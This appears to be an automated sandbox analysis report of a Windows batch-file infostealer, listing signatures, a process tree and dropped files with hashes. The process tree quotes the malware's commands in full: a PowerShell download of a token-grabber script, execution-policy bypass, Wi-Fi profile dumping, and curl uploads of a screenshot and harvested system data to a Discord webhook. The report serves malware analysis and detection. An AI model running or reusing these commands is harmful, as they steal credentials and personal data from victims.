Analysis

  • max time kernel
    136s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/06/2023, 06:33

General

  • Target

    nagogy.bat

  • Size

    825KB

  • MD5

    3904e52b3c695fc9ed5597ad43ad7e1e

  • SHA1

    8d7e466864bfa7537174dbe4f415c441568eb256

  • SHA256

    30721718265f7daf74537fa568538d7401eb2d4d44956a762a5554aea9125520

  • SHA512

    5e6d13a315256c5e14085c88b81f9a19c42387b324ce75cc6fa85fa5f62ae77eb5e0e2cc17dd341c2afada8880793674f5edb542033fb8757b35356ff4551aec

  • SSDEEP

    384:Kkolp89CairObhgpwcSCDNKv6xtdBANdRxtjSQwlJeEuiHovbwwTMZ/t2nOlfUcS:hToh1X6klJ7uiHovbEsfKZTTz2Ff

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 3 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nagogy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4644
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:372
      • C:\Windows\system32\findstr.exe
        findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\nagogy.bat"
        2⤵
          PID:3368
        • C:\Windows\system32\chcp.com
          chcp 65001
          2⤵
            PID:2188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\nagogy.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE) -or ($bytes[2] -ne 0x26)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3672
          • C:\Windows\system32\net.exe
            net session
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3792
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              3⤵
                PID:116
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1113813551786762362/wTthF0rdAtdGqa00tUDo4FzvJl1vOZ4S1aRL7IDjpBuWTN0EEVbPRP9Kw0XVdzU45E2D' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
              2⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4664
            • C:\Windows\system32\attrib.exe
              attrib +h +s powershell123.ps1
              2⤵
              • Views/modifies file attributes
              PID:4752
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1816
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
              2⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3992
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zhdr3ti0\zhdr3ti0.cmdline"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1148
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3C4.tmp" "c:\Users\Admin\AppData\Local\Temp\zhdr3ti0\CSCBE0048DA8DB14FCCAA61D5ADF4126.TMP"
                  4⤵
                    PID:2628
                • C:\Windows\system32\NETSTAT.EXE
                  "C:\Windows\system32\NETSTAT.EXE" -ano
                  3⤵
                  • Gathers network information
                  PID:4488
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" wlan show profiles
                  3⤵
                    PID:2160
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xvy4jnim\xvy4jnim.cmdline"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:232
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14D0.tmp" "c:\Users\Admin\AppData\Local\Temp\xvy4jnim\CSC74E881F618924DD395E75B60C317796E.TMP"
                      4⤵
                        PID:4284
                    • C:\Windows\system32\curl.exe
                      "C:\Windows\system32\curl.exe" -F "payload_json={\"username\": \"KDOT\", \"content\": \":hamsa: **Screenshot**\"}" -F file=@\"C:\Users\Admin\AppData\Local\temp\desktop-screenshot.png\" https://discord.com/api/webhooks/1113813551786762362/wTthF0rdAtdGqa00tUDo4FzvJl1vOZ4S1aRL7IDjpBuWTN0EEVbPRP9Kw0XVdzU45E2D
                      3⤵
                        PID:116
                      • C:\Users\Admin\AppData\Local\Temp\main.exe
                        "C:\Users\Admin\AppData\Local\Temp\main.exe" https://discord.com/api/webhooks/1113813551786762362/wTthF0rdAtdGqa00tUDo4FzvJl1vOZ4S1aRL7IDjpBuWTN0EEVbPRP9Kw0XVdzU45E2D
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3416
                        • C:\Users\Admin\AppData\Local\Temp\main.exe
                          "C:\Users\Admin\AppData\Local\Temp\main.exe" https://discord.com/api/webhooks/1113813551786762362/wTthF0rdAtdGqa00tUDo4FzvJl1vOZ4S1aRL7IDjpBuWTN0EEVbPRP9Kw0XVdzU45E2D
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3988
                      • C:\Windows\system32\curl.exe
                        "C:\Windows\system32\curl.exe" -X POST -F "payload_json={\"username\": \"KDOT\", \"content\": \"\", \"avatar_url\": \"https://i.postimg.cc/k58gQ03t/PTG.gif\"}" -F file=@C:\Users\Admin\AppData\Local\Temp\KDOT.zip https://discord.com/api/webhooks/1113813551786762362/wTthF0rdAtdGqa00tUDo4FzvJl1vOZ4S1aRL7IDjpBuWTN0EEVbPRP9Kw0XVdzU45E2D
                        3⤵
                          PID:1956
                      • C:\Windows\system32\attrib.exe
                        attrib -h -s powershell123.ps1
                        2⤵
                        • Views/modifies file attributes
                        PID:2348
                      • C:\Windows\system32\timeout.exe
                        timeout 3
                        2⤵
                        • Delays execution with timeout.exe
                        PID:2916
                      • C:\Windows\system32\net.exe
                        net session
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5036
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 session
                          3⤵
                            PID:484
                        • C:\Windows\system32\findstr.exe
                          findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\nagogy.bat"
                          2⤵
                            PID:2364

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          944B

                          MD5

                          3b8ef11aff69e43d47f234d5ee0a72b3

                          SHA1

                          3869fe51c123c88c1be43b11044b580097466f26

                          SHA256

                          0025a82d5c9ef9b1786333fb007e72601dfbf9340d75230f8a3e687e6a107889

                          SHA512

                          b46facc11d98c50dacbbd9f36d4715402356d95eed1c073615fcd680bfb142b39830311915fba16a7d8ec0e71640c5d4e9f78930916b8f6432a0f0c203f6fc2b

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          abc27673d9c940ad74b41c58391d2412

                          SHA1

                          9a31a521a521dcd0f974ce6f7a50aecc69a50df0

                          SHA256

                          cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

                          SHA512

                          c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          64B

                          MD5

                          c5715f5d718d906de58775928f40f2fc

                          SHA1

                          d0aadedd8387c247d566bbc3a3c268355590ed4e

                          SHA256

                          f322c2c3df5f122c7056bd03e784dcc05698952e3a305b059049b4f34ac7cb3d

                          SHA512

                          d5bd87cef0c7be532a92422cd6b46ff7474d87de61aa81a9080a2d48e7903d0223c97e8f8489d82fcb6552d6fbe58efaa5aef39e7b773b95e0b0afca21278953

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\CPU.txt

                          Filesize

                          76B

                          MD5

                          6f53aae1e5885a7b626a39138707ffa9

                          SHA1

                          bf94085a35e40aebb7447eff7fbb2b0319f70bb4

                          SHA256

                          24fea3ea3d291bffb4a05f71f2eea3008a94214c7d2706e4a60d47fe44fcfe1a

                          SHA512

                          12e49f39ad1985da5906547907823411df9f390203c72ded3882b70a7a1fda437b369338db2cad1e6ca9261df2e68afd12e77a35d02e090c97765f0935487a3c

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\DiskInfo.txt

                          Filesize

                          304B

                          MD5

                          156b4336e806bb6c2fc85d89b95a48a1

                          SHA1

                          6374eb686692a509ee7cb4a574c2457f2a30f32d

                          SHA256

                          d657460d0ead41ad03c270290ec9f67703ffe946d867f4fa8151b86c5f41c9e4

                          SHA512

                          99e79fe3bb4a0b1c3e0531528bdf9b6f184435c80c8eba31bbc5f9453c9ac31310e15ede37e0c1462114ca7a1e5b533366ac12ad7ea237c06d45d50464a7ddcc

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\GPU.txt

                          Filesize

                          68B

                          MD5

                          caac31d027355bf7e9aac064c0ecda54

                          SHA1

                          05bd1300e21e1361108ca3fd05e3ce1984be5fae

                          SHA256

                          45bd7125a999074e2a7a96cdb3f06c2dbd8c45ecedbe9d65248e796a04764b8b

                          SHA512

                          7d59ea072f022c815996bb5783efa49215ab3df8035ecdf729ee476905353c7ff93f7d29b89bf8c84fc3e7833bf488191434e0934a4a8480d7427d9de33b0a32

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\Installed-Applications.txt

                          Filesize

                          8KB

                          MD5

                          d730b8914e36cd9ed10934fffff4e4f1

                          SHA1

                          33c7123b85a5fb950d0a51ba2a3063fe14b86860

                          SHA256

                          681b2377e5805e87192a8e0363c501eaddbc4410200e1272d4c2d2e72a0d58a8

                          SHA512

                          03be7d04140f616239000c1c3a518282484e1ccb2d0ee54c68153d9dff68c32e13f454f44341709b6c08922695d850fc5a78296cfa77fe1e9a66a9881197afe4

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\NetworkAdapters.txt

                          Filesize

                          512B

                          MD5

                          13ea1838bf3c37282ef0842e31651e03

                          SHA1

                          6a71c12df2d35b694eceee59ab20666e33a5b5a0

                          SHA256

                          8ffe1078686391a135e8bb2b2c4ac4581a6c893e0adcb76bdd5c360dc4f7b1ea

                          SHA512

                          a8184f33d6b76efe1c1ea462c56af130f15db5bbec4f5e863d7ddb8b13c2a81b899881e02f12e7230ba0880118c7cb12ef273ae5931e404c15ee933615e3eeee

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\ProductKey.txt

                          Filesize

                          64B

                          MD5

                          077d49fce459a986fc0c864f3486143d

                          SHA1

                          587801892a3e9d19af223e516a42fb545843f91c

                          SHA256

                          84407693be0afd3ff790836eb38588042a88f0126c9b60c3d85342a05b535455

                          SHA512

                          3feb4d4a0821c040c9a4604ca75314b8aaa72d883443d6c251fd66065111f3afa482f2ab42cf5aec36401cbfd390b0893292edbf33bb37fba81605758b7f3e0f

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\StartUpApps.txt

                          Filesize

                          1KB

                          MD5

                          a1d4769b72d0ab223d110400e9506738

                          SHA1

                          b0996d0d2d4c6d0b0e7fdf146a4e9022d8d19803

                          SHA256

                          a4a1ee5421188e266a97e11797c4f86701d40d16ead3c904c40667b3972ae8eb

                          SHA512

                          71721a65e031e4b7347d5d1a048192ed33bdd2e3e564cb167281caf3e3cd108e09ea042ae0aea42aec63bda62cbd101fa3b0747e68dc0322a0f449ef1b4f92b7

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\WIFIPasswords.txt

                          Filesize

                          10B

                          MD5

                          313f6ee67972c25292f2c6e3d5d1c381

                          SHA1

                          c90b4164504b3ab82cd69c58c38125b3a953cc50

                          SHA256

                          a2b6352f454bbbd559b5b753e606d2fddf9db438cfa062477496431ac7802c85

                          SHA512

                          c1d93f7c29d08029a16f36c2576e497ef928f4ba272120ec15551d77d0824ec21743cd2fd16e0dce071287b5414cf1d56831ca97f759b34d4dc64442a15786bd

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\ip.txt

                          Filesize

                          30B

                          MD5

                          a8321ddadae9e8b5cbeed836d9e7762a

                          SHA1

                          b149c04a3a120393d6e9e580923504a8c63f27fb

                          SHA256

                          d9dd0eebb6a9ae6452983b4e22341acfd17d4c42e3b191b1a83f0c85d962c8b0

                          SHA512

                          fbbee4721fbac32b9510623a1bd402e49e738ade0a84ec1a2ff1b02a4da7ade951e86154ff28212720c21930ee2a72fa5eeb332a37d5e59d36d887c53157cb32

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\mac.txt

                          Filesize

                          40B

                          MD5

                          24b5ca94dfb4bd32349112cd59cc012a

                          SHA1

                          65537e0b57c093f0d5b2eaa4fce818a68b682908

                          SHA256

                          c67abadb37460f7da61fec63712e76f1d95e183e7b80e8a28a5757a012b419db

                          SHA512

                          6b8d4f7f71e38cb57874fa7ff14f3f3e13a4623eb322e1dd4cff7db1aa55c861ef3e8cb17d8679dfc80efeb95fb6f071ede82057366dd0c4a1aa2dfff10f29d8

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\netstat.txt

                          Filesize

                          10KB

                          MD5

                          eec27bf2216d79643470f1031e9d9579

                          SHA1

                          16df3dff4df4d0871ba26710f63e750fba2b8b82

                          SHA256

                          61a6c8505f82b9b1a05b3d3a8d6e04a06101df87d44995d8004a25963c4c60ef

                          SHA512

                          ad3a84a1e46c796640d069f2e240e02fb17f3036fa09eabc281204fcbfe89f84e3e3a9ab3d1f49ee12c36c29b5760545ed3c8e5ce2efa8a6283a1bbb562f3739

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\running-applications.txt

                          Filesize

                          24KB

                          MD5

                          61ae3c888a95995f905d3dfe12a8ef96

                          SHA1

                          95ee83e040064ed4e5e4ccfe6e62bcb36aaaddaf

                          SHA256

                          6d66cd8959eefd43ae3cfcbe43696f15d90d171cd89390a34081d2d835333dbe

                          SHA512

                          6c1d3205009794e957518fda4e63b38e004c49af8fc957ec77542c980cf8056776c5dac3bf3d1ea624b5364cccbdc3553de4a8f13990b8a2af6e3699b4a9ba59

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\running-services.txt

                          Filesize

                          19KB

                          MD5

                          230e90316973194613ec443f1f29418b

                          SHA1

                          6da156c3b74164aa0777a05d79b5e38e5c1c480d

                          SHA256

                          02bb078f99757366987a65556678de6fba0fb446b546a166abc9efc9985d2c96

                          SHA512

                          0468872f321918989592bda2298f585c11fd580b5cb895f9da25137f5d95d62f55f8d50c04f414213d5f3e4a65af66fd9dd3297856bea9f9b6be47d3c544a5be

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\system_info.txt

                          Filesize

                          23KB

                          MD5

                          bbcd8dc639fe91c813066606e8e27f43

                          SHA1

                          b5b428d28f01189ce08d65a3ae308c6cf5c4df79

                          SHA256

                          5523a61a86c00cce02cb300e608c9afc8526ff26669c47d897237ca21810ead9

                          SHA512

                          2358e74c61e5f6eb52ae5bf3b2deafbf6668cde080b7df8391a92fc8daf993ebd3c1f13e300af495b0a6aa9db24fc6272fa9ff0d1fc344f3bb547bb6288bd00a

                        • C:\Users\Admin\AppData\Local\Temp\KDOT\uuid.txt

                          Filesize

                          78B

                          MD5

                          afb801e22afd7dc227465d1dd2265025

                          SHA1

                          9b9bab6b75d8b16d89a166fe3b0627857e660004

                          SHA256

                          994d907fa9e9d185c1add16351bbba597cc5821fda9b194f5eda8f5eee8187b9

                          SHA512

                          fb94b871c694eea521dace7eee71aea1101dce79fe07f21cd8e87a2a293eb71beffd5b770f28aeef5869de4515798575ee4eab16b72fe451fa9ec0dcccd7a484

                        • C:\Users\Admin\AppData\Local\Temp\RES14D0.tmp

                          Filesize

                          1KB

                          MD5

                          aa3fe8469b2f5f99def45f9704850c8f

                          SHA1

                          15b45a35261ec2388ee95add679e123590723775

                          SHA256

                          d95595c62e5e62d93611eda83a58c1caae49e1ff17cb48a2ac37d13abd7a71ab

                          SHA512

                          7b614d1f94edc6f2a38815822fa6216ebccf12aa73b5d65aa26320d670f29ad6a3204cc9572f79a0dd0b5f9b04a9fe9f4cb1665cb58bd5a21a39d4fce3dc32f1

                        • C:\Users\Admin\AppData\Local\Temp\RESB3C4.tmp

                          Filesize

                          1KB

                          MD5

                          35e01d94c250515d0514ba48675b99f0

                          SHA1

                          18d8d5e7bb653684923268a635016f6ca515db9b

                          SHA256

                          422c84d2736168dc1db2b6574d1756265cef8799061d7b85ac9820ea7b2c34d6

                          SHA512

                          bc81a900baddf6508005075bf62a0e0727d5b5fc1ec69ac1045bc89250cdcdfebebaf50a432cd90b85e4cb6bdcb6829b05217d0764a753a9aee41271f0b2cb6e

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_Salsa20.pyd

                          Filesize

                          13KB

                          MD5

                          e598d24941e68620aef43723b239e1c5

                          SHA1

                          fa3c711aa55a700e2d5421f5f73a50662a9cc443

                          SHA256

                          e63d4123d894b61e0242d53813307fa1ff3b7b60818827520f7ff20cabcd8904

                          SHA512

                          904e04fb28cffa2890c0cb4f1169a7cc830224740f0df3da622ac2eb9b8f8bdbb4de88836e40a0126be0eb3e5131a8d8b5aaacd782d1c5875a2fbbc939f78d5b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_Salsa20.pyd

                          Filesize

                          13KB

                          MD5

                          e598d24941e68620aef43723b239e1c5

                          SHA1

                          fa3c711aa55a700e2d5421f5f73a50662a9cc443

                          SHA256

                          e63d4123d894b61e0242d53813307fa1ff3b7b60818827520f7ff20cabcd8904

                          SHA512

                          904e04fb28cffa2890c0cb4f1169a7cc830224740f0df3da622ac2eb9b8f8bdbb4de88836e40a0126be0eb3e5131a8d8b5aaacd782d1c5875a2fbbc939f78d5b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_cbc.pyd

                          Filesize

                          12KB

                          MD5

                          ff2c1c4a7ae46c12eb3963f508dad30f

                          SHA1

                          4d759c143f78a4fe1576238587230acdf68d9c8c

                          SHA256

                          73cf4155df136db24c2240e8db0c76bedcbb721e910558512d6008adaf7eed50

                          SHA512

                          453ef9eed028ae172d4b76b25279ad56f59291be19eb918de40db703ec31cddf60dce2e40003dfd1ea20ec37e03df9ef049f0a004486cc23db8c5a6b6a860e7b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_cbc.pyd

                          Filesize

                          12KB

                          MD5

                          ff2c1c4a7ae46c12eb3963f508dad30f

                          SHA1

                          4d759c143f78a4fe1576238587230acdf68d9c8c

                          SHA256

                          73cf4155df136db24c2240e8db0c76bedcbb721e910558512d6008adaf7eed50

                          SHA512

                          453ef9eed028ae172d4b76b25279ad56f59291be19eb918de40db703ec31cddf60dce2e40003dfd1ea20ec37e03df9ef049f0a004486cc23db8c5a6b6a860e7b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_cfb.pyd

                          Filesize

                          13KB

                          MD5

                          fe489576d8950611c13e6cd1d682bc3d

                          SHA1

                          2411d99230ef47d9e2e10e97bdea9c08a74f19af

                          SHA256

                          bb79a502eca26d3418b49a47050fb4015fdb24bee97ce56cdd070d0fceb96ccd

                          SHA512

                          0f605a1331624d3e99cfdc04b60948308e834aa784c5b7169986eefbce4791faa148325c1f1a09624c1a1340e0e8cf82647780ffe7b3e201fdc2b60bcfd05e09

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_cfb.pyd

                          Filesize

                          13KB

                          MD5

                          fe489576d8950611c13e6cd1d682bc3d

                          SHA1

                          2411d99230ef47d9e2e10e97bdea9c08a74f19af

                          SHA256

                          bb79a502eca26d3418b49a47050fb4015fdb24bee97ce56cdd070d0fceb96ccd

                          SHA512

                          0f605a1331624d3e99cfdc04b60948308e834aa784c5b7169986eefbce4791faa148325c1f1a09624c1a1340e0e8cf82647780ffe7b3e201fdc2b60bcfd05e09

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_ctr.pyd

                          Filesize

                          14KB

                          MD5

                          a33ac93007ab673cb2780074d30f03bd

                          SHA1

                          b79fcf833634e6802a92359d38fbdcf6d49d42b0

                          SHA256

                          4452cf380a07919b87f39bc60768bcc4187b6910b24869dbd066f2149e04de47

                          SHA512

                          5d8bdca2432cdc5a76a3115af938cc76cf1f376b070a7fd1bcbf58a7848d4f56604c5c14036012027c33cc45f71d5430b5abbfbb2d4adaf5c115ddbd1603ab86

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_ctr.pyd

                          Filesize

                          14KB

                          MD5

                          a33ac93007ab673cb2780074d30f03bd

                          SHA1

                          b79fcf833634e6802a92359d38fbdcf6d49d42b0

                          SHA256

                          4452cf380a07919b87f39bc60768bcc4187b6910b24869dbd066f2149e04de47

                          SHA512

                          5d8bdca2432cdc5a76a3115af938cc76cf1f376b070a7fd1bcbf58a7848d4f56604c5c14036012027c33cc45f71d5430b5abbfbb2d4adaf5c115ddbd1603ab86

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_ecb.pyd

                          Filesize

                          10KB

                          MD5

                          821aaa9a74b4ccb1f75bd38b13b76566

                          SHA1

                          907c8ee16f3a0c6e44df120460a7c675eb36f1dd

                          SHA256

                          614b4f9a02d0191c3994205ac2c58571c0af9b71853be47fcf3cb3f9bc1d7f54

                          SHA512

                          9d2ef8f1a2d3a7374ff0cdb38d4a93b06d1db4219bae06d57a075ee3dff5f7d6f890084dd51a972ac7572008f73fde7f5152ce5844d1a19569e5a9a439c4532b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_ecb.pyd

                          Filesize

                          10KB

                          MD5

                          821aaa9a74b4ccb1f75bd38b13b76566

                          SHA1

                          907c8ee16f3a0c6e44df120460a7c675eb36f1dd

                          SHA256

                          614b4f9a02d0191c3994205ac2c58571c0af9b71853be47fcf3cb3f9bc1d7f54

                          SHA512

                          9d2ef8f1a2d3a7374ff0cdb38d4a93b06d1db4219bae06d57a075ee3dff5f7d6f890084dd51a972ac7572008f73fde7f5152ce5844d1a19569e5a9a439c4532b

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_ofb.pyd

                          Filesize

                          12KB

                          MD5

                          619fb21dbeaf66bf7d1b61f6eb94b8c5

                          SHA1

                          7dd87080b4ed0cba070bb039d1bdeb0a07769047

                          SHA256

                          a2afe994f8f2e847951e40485299e88718235fbefb17fccca7ace54cc6444c46

                          SHA512

                          ee3dbd00d6529fcfcd623227973ea248ac93f9095430b9dc4e3257b6dc002b614d7ce4f3daab3e02ef675502afdbe28862c14e30632e3c715c434440615c4dd4

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Cipher\_raw_ofb.pyd

                          Filesize

                          12KB

                          MD5

                          619fb21dbeaf66bf7d1b61f6eb94b8c5

                          SHA1

                          7dd87080b4ed0cba070bb039d1bdeb0a07769047

                          SHA256

                          a2afe994f8f2e847951e40485299e88718235fbefb17fccca7ace54cc6444c46

                          SHA512

                          ee3dbd00d6529fcfcd623227973ea248ac93f9095430b9dc4e3257b6dc002b614d7ce4f3daab3e02ef675502afdbe28862c14e30632e3c715c434440615c4dd4

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Hash\_BLAKE2s.pyd

                          Filesize

                          14KB

                          MD5

                          cea18eb87e54403af3f92f8d6dbdd6e8

                          SHA1

                          f1901a397edd9c4901801e8533c5350c7a3a8513

                          SHA256

                          7fe364add28266c8211457896d2517fdb0ee9efc8cb65e716847965b3e9d789f

                          SHA512

                          74a3c94d8c4070b66258a5b847d9ced705f81673dd12316604e392c9d21ae6890e3720ca810b38e140650397c6ff05fd2fa0ff2d136fc5579570520ffdc1dbac

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Hash\_BLAKE2s.pyd

                          Filesize

                          14KB

                          MD5

                          cea18eb87e54403af3f92f8d6dbdd6e8

                          SHA1

                          f1901a397edd9c4901801e8533c5350c7a3a8513

                          SHA256

                          7fe364add28266c8211457896d2517fdb0ee9efc8cb65e716847965b3e9d789f

                          SHA512

                          74a3c94d8c4070b66258a5b847d9ced705f81673dd12316604e392c9d21ae6890e3720ca810b38e140650397c6ff05fd2fa0ff2d136fc5579570520ffdc1dbac

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Hash\_MD5.pyd

                          Filesize

                          15KB

                          MD5

                          9adc256c4384ee1fe8c0ad5c5e44cd95

                          SHA1

                          c5fc6e7ae0dfa5cf87833b23cd0294e9ae1f5bca

                          SHA256

                          77ee1e140414615113eabb5fc43dbba69daee5951b7e27e387ca295b0c5f651d

                          SHA512

                          4cb0905f0196b34aa66ac6ff191bd4705146a3e00dcd8b3f674740d29404c22b61f3c75b6ffb1fd5fdb044320c89a2f3ef224f1f1aa35342ff3dc5f701642b76

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Hash\_MD5.pyd

                          Filesize

                          15KB

                          MD5

                          9adc256c4384ee1fe8c0ad5c5e44cd95

                          SHA1

                          c5fc6e7ae0dfa5cf87833b23cd0294e9ae1f5bca

                          SHA256

                          77ee1e140414615113eabb5fc43dbba69daee5951b7e27e387ca295b0c5f651d

                          SHA512

                          4cb0905f0196b34aa66ac6ff191bd4705146a3e00dcd8b3f674740d29404c22b61f3c75b6ffb1fd5fdb044320c89a2f3ef224f1f1aa35342ff3dc5f701642b76

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Hash\_SHA1.pyd

                          Filesize

                          17KB

                          MD5

                          5e6fef0ff0c688db13ed2777849e8e87

                          SHA1

                          3e739107b1b5ff8f1ffaac2ede75b71d4ebd128f

                          SHA256

                          e88a0347f9969991756815dff0af940f00e966bc7875aa4763a2c80516f7e4ed

                          SHA512

                          b97d4aa0ae76f528e643180ed300f1a50eafe8b82c27212a95ce380bca85f9ce1ff1ac1190173d56776fd663f649817514d6501ce80518f526159398daa6f55c

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34162\Crypto\Hash\_SHA1.pyd

                          Filesize

                          17KB

                          MD5

                          5e6fef0ff0c688db13ed2777849e8e87

                          SHA1

                          3e739107b1b5ff8f1ffaac2ede75b71d4ebd128f

                          SHA256

                          e88a0347f9969991756815dff0af940f00e966bc7875aa4763a2c80516f7e4ed

                          SHA512

                          b97d4aa0ae76f528e643180ed300f1a50eafe8b82c27212a95ce380bca85f9ce1ff1ac1190173d56776fd663f649817514d6501ce80518f526159398daa6f55c

